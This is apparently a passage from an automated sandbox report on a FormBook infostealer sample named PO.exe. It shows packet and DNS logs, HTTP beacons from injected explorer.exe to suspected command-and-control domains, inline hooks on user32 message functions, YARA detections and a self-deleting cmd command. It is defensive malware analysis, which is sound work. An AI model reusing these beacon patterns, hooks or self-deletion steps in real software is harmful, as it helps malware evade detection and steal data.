                                      Apr 8, 2021 12:10:33.269407034 CEST | 49694 | 80 | 192.168.2.5 | 44.227.76.166
                                      Apr 8, 2021 12:10:33.437623024 CEST | 80 | 49694 | 44.227.76.166 | 192.168.2.5

                                      UDP Packets

                                      Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                      Apr 8, 2021 12:08:21.699332952 CEST | 56798 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:08:21.733257055 CEST | 53 | 56798 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:08:21.852818966 CEST | 52480 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:08:21.865542889 CEST | 53 | 52480 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:08:30.327725887 CEST | 51165 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:08:30.339555979 CEST | 53 | 51165 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:08:31.201592922 CEST | 53183 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:08:31.214391947 CEST | 53 | 53183 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:08:32.134387016 CEST | 57587 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:08:32.148320913 CEST | 53 | 57587 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:08:38.045337915 CEST | 55432 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:08:38.057888985 CEST | 53 | 55432 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:08:40.378134012 CEST | 64936 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:08:40.390716076 CEST | 53 | 64936 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:08:46.192307949 CEST | 52704 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:08:46.209988117 CEST | 53 | 52704 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:08:51.159001112 CEST | 52212 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:08:51.175426006 CEST | 53 | 52212 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:08:53.754745007 CEST | 54302 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:08:53.766885996 CEST | 53 | 54302 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:08:55.126512051 CEST | 53784 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:08:55.139259100 CEST | 53 | 53784 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:08:56.251838923 CEST | 65307 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:08:56.264457941 CEST | 53 | 65307 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:08:57.022464037 CEST | 64344 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:08:57.035022974 CEST | 53 | 64344 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:09:01.906601906 CEST | 62060 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:09:01.919754982 CEST | 53 | 62060 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:09:51.705511093 CEST | 61805 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:09:52.035056114 CEST | 53 | 61805 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:10:12.245260954 CEST | 54795 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:10:12.307060003 CEST | 53 | 54795 | 8.8.8.8 | 192.168.2.5
                                      Apr 8, 2021 12:10:32.642216921 CEST | 49557 | 53 | 192.168.2.5 | 8.8.8.8
                                      Apr 8, 2021 12:10:32.767242908 CEST | 53 | 49557 | 8.8.8.8 | 192.168.2.5

                                      DNS Queries

                                      Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                      Apr 8, 2021 12:09:51.705511093 CEST | 192.168.2.5 | 8.8.8.8 | 0x5d97 | Standard query (0) | www.cwyxonlp.icu | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:10:12.245260954 CEST | 192.168.2.5 | 8.8.8.8 | 0x1 | Standard query (0) | www.websiteworlda-z.com | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:10:32.642216921 CEST | 192.168.2.5 | 8.8.8.8 | 0xb793 | Standard query (0) | www.phorice.com | A (IP address) | IN (0x0001)

                                      DNS Answers

                                      Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                      Apr 8, 2021 12:09:52.035056114 CEST | 8.8.8.8 | 192.168.2.5 | 0x5d97 | Name error (3) | www.cwyxonlp.icu | none | none | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:10:12.307060003 CEST | 8.8.8.8 | 192.168.2.5 | 0x1 | No error (0) | www.websiteworlda-z.com | | 194.117.254.63 | A (IP address) | IN (0x0001)
                                      Apr 8, 2021 12:10:32.767242908 CEST | 8.8.8.8 | 192.168.2.5 | 0xb793 | No error (0) | www.phorice.com | pixie.porkbun.com | | CNAME (Canonical name) | IN (0x0001)
                                      Apr 8, 2021 12:10:32.767242908 CEST | 8.8.8.8 | 192.168.2.5 | 0xb793 | No error (0) | pixie.porkbun.com | | 44.227.76.166 | A (IP address) | IN (0x0001)

                                      HTTP Request Dependency Graph

                                      • www.websiteworlda-z.com
                                      • www.phorice.com

                                      HTTP Packets

                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                      0 | 192.168.2.5 | 49693 | 194.117.254.63 | 80 | C:\Windows\explorer.exe
                                      Timestamp | kBytes transferred | Direction | Data
                                      Apr 8, 2021 12:10:12.333529949 CEST | 332 | OUT | GET /r4ei/?_ZA0p2=cRhAr0dy1lG+6v8jj0sxWagS9ZGCZip2Fr4SFXT7OXMmHzjmweO35OAl28FoqWQGc0rZ&GzuLH=VBZLTBc0f HTTP/1.1
                                      Host: www.websiteworlda-z.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:10:12.351783037 CEST333INHTTP/1.1 404 Not Found
                                      Date: Thu, 08 Apr 2021 10:10:12 GMT
                                      Server: Apache
                                      Content-Length: 269
                                      Connection: close
                                      Content-Type: text/html; charset=iso-8859-1
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 77 65 62 73 69 74 65 77 6f 72 6c 64 61 2d 7a 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.websiteworlda-z.com Port 80</address></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      1192.168.2.54969444.227.76.16680C:\Windows\explorer.exe
                                      TimestampkBytes transferredDirectionData
                                      Apr 8, 2021 12:10:33.100172997 CEST334OUTGET /r4ei/?_ZA0p2=qFx0jq35EoqhqGMmxZfRcaIhnrtQSZTAjbNVWKcVQ7fc4zdL4G4zojbsIieSdo+D23N6&GzuLH=VBZLTBc0f HTTP/1.1
                                      Host: www.phorice.com
                                      Connection: close
                                      Data Raw: 00 00 00 00 00 00 00
                                      Data Ascii:
                                      Apr 8, 2021 12:10:33.269149065 CEST335INHTTP/1.1 307 Temporary Redirect
                                      Server: openresty
                                      Date: Thu, 08 Apr 2021 10:10:33 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Content-Length: 168
                                      Connection: close
                                      Location: http://phorice.com
                                      X-Frame-Options: sameorigin
                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 37 20 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>307 Temporary Redirect</title></head><body><center><h1>307 Temporary Redirect</h1></center><hr><center>openresty</center></body></html>


Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xEB
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xEB
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x88 0x8E 0xEB
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x80 0x0E 0xEB

Statistics

Behavior


System Behavior

General

Start time: 12:08:28
Start date: 08/04/2021
Path: C:\Users\user\Desktop\PO.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\PO.exe'
Imagebase: 0x400000
File size: 228037 bytes
MD5 hash: 665CB19601850467AF3EE7D9FD0E0350
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.242379104.0000000002670000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 12:08:29
Start date: 08/04/2021
Path: C:\Users\user\Desktop\PO.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\PO.exe'
Imagebase: 0x400000
File size: 228037 bytes
MD5 hash: 665CB19601850467AF3EE7D9FD0E0350
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.292997768.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.293202588.00000000006C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.293226365.00000000006F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.238704374.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 12:08:35
Start date: 08/04/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff693d90000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:08:55
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\explorer.exe
Imagebase: 0x900000
File size: 3611360 bytes
MD5 hash: 166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.496722732.0000000000890000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.501170602.0000000004900000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.501014496.00000000048D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

General

Start time: 12:08:58
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\PO.exe'
Imagebase: 0x1010000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:08:59
Start date: 08/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
